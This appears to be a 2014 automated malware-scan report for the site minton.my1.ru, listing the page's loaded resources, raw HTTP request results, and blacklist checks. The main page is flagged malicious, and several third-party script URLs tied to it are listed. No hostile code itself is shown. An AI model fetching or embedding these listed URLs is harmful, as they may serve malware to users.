Scanned pages/files
Request | Server response | Status |
http://minton.my1.ru/ | 200 OK Content-Length: 70499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://s37.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s37.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s37.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://moijs.com/?id=91397 | 500 Can't connect to moijs.com:80 Content-Length: 184 Content-Type: text/plain | clean |
http://moijs.com/test404page.js | 500 Can't connect to moijs.com:80 Content-Length: 184 Content-Type: text/plain | clean |
http://212.150.34.116/static.php?id=28645&site=150773 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://z720.takru.com/in.php?id=727153 | 200 OK Content-Length: 2734 Content-Type: text/html | clean |
http://r1.wmlink.ru/?id=153351 | 200 OK Content-Length: 726 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: minton.my1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 07 Nov 2014 18:25:49 GMT
Server: uServ/3.2.2
Content-Length: 70499
Content-Type: text/html; charset=UTF-8
...70499 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: minton.my1.ru
Referer: http://www.google.com/search?q=minton.my1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=minton.my1.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://minton.my1.ru/
Result: minton.my1.ru is not infected or malware details are not published yet.